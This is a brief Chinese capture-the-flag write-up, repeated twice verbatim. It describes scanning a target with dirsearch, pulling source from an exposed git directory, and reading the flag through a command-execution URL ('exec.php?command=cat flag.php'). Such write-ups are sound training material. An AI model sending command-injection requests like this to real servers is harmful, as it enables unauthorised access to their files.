靶机:http://183.129.189.62:20324/
先用dirsearch进行扫描
存在git漏洞,提取出来查看代码
传入command参数,得到flag
http://183.129.189.62:20324/exec.php?command=cat flag.php
靶机:http://183.129.189.62:20324/
先用dirsearch进行扫描
存在git漏洞,提取出来查看代码
传入command参数,得到flag
http://183.129.189.62:20324/exec.php?command=cat flag.php